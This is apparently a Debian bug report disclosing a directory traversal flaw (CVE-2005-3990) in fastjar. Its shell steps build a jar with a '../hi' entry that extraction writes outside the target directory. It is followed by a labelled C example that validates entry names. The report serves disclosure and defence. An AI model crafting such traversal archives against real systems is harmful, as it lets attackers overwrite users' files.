Package: fastjar
Version: 1:4.1.0-4
Severity: normal
Tags: security

CVE-2005-3990: "Directory traversal vulnerability in FastJar 0.93 allows remote attackers to overwrite arbitrary files via a .jar file containing filenames with "../" sequences."

I can reproduce this with the following steps (modified from an earlier SUN jar vulnerability report [1]):

$ mkdir /tmp/foo
$ echo hi > /tmp/hi
$ cd /tmp/foo
$ fastjar cvf foo.jar ../hi
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/MANIFEST.MF (in=56) (out=56) (stored 0%)
adding: ../hi (in=3) (out=5) (deflated -66%)
Total:
------
(in = 51) (out = 371) (deflated -627%)
$ rm ../hi
$ fastjar xvf foo.jar
created: META-INF/
extracted: META-INF/MANIFEST.MF
inflated: ../hi
$ cat ../hi
hi

Please mention the CVE in your changelog.

Thanks,
Alec

[1] http://www.securiteam.com/securitynews/5IP0C0AFGW.html

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/dash
Kernel: Linux 2.6.16-alec-laptop
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)

Versions of packages fastjar depends on:
ii  libc6   2.3.6-9     GNU C Library: Shared libraries
ii  zlib1g  1:1.2.3-11  compression library - runtime

fastjar recommends no packages.

-- no debconf information
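The standard mitigation for this class of bug is to validate every entry name before the extractor opens an output file, so that an entry such as "../hi" is skipped instead of written outside the destination directory. The check below is an added example written for this report, not fastjar's code and not the fix that shipped in Debian; the function names jar_entry_name_is_safe and count_unsafe_entries are hypothetical, and the entry list is constructed from the foo.jar reproduction above.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Added example, not fastjar's code.  Decide whether an archive entry name may
 * be extracted below the destination directory: reject absolute paths, DOS
 * drive prefixes and any "." or ".." component ('/' and '\\' both separate). */
bool jar_entry_name_is_safe(const char *name)
{
    if (name == NULL || name[0] == '\0')
        return false;
    if (name[0] == '/' || name[0] == '\\' || name[1] == ':')
        return false;                          /* "/etc/x", "C:\x" */
    const char *p = name;
    for (;;) {
        const char *end = p;                   /* scan one component */
        while (*end != '\0' && *end != '/' && *end != '\\')
            end++;
        size_t len = (size_t)(end - p);
        if (len == 1 && p[0] == '.')
            return false;                      /* "./x" */
        if (len == 2 && p[0] == '.' && p[1] == '.')
            return false;                      /* "../hi" traversal */
        if (len == 0 && *end != '\0')
            return false;                      /* "a//b" */
        if (*end == '\0')
            return true;                       /* "META-INF/" is fine */
        p = end + 1;
    }
}

/* Filter pass a hardened extractor runs before opening any output file. */
size_t count_unsafe_entries(const char *const *names, size_t n)
{
    size_t unsafe = 0;
    for (size_t i = 0; i < n; i++)
        if (!jar_entry_name_is_safe(names[i])) {
            fprintf(stderr, "skipping unsafe entry: %s\n", names[i]);
            unsafe++;
        }
    return unsafe;
}
int main(void)
{
    /* constructed sample: the entry list of foo.jar from the report */
    const char *const entries[] = {"META-INF/", "META-INF/MANIFEST.MF", "../hi"};
    size_t n = sizeof entries / sizeof entries[0];
    printf("%zu of %zu entries rejected\n", count_unsafe_entries(entries, n), n);
    return 0;
}
```

Rejecting on the entry name alone is deliberately conservative; an extractor that also follows symlinks it created earlier in the same archive needs a second check on the resolved output path.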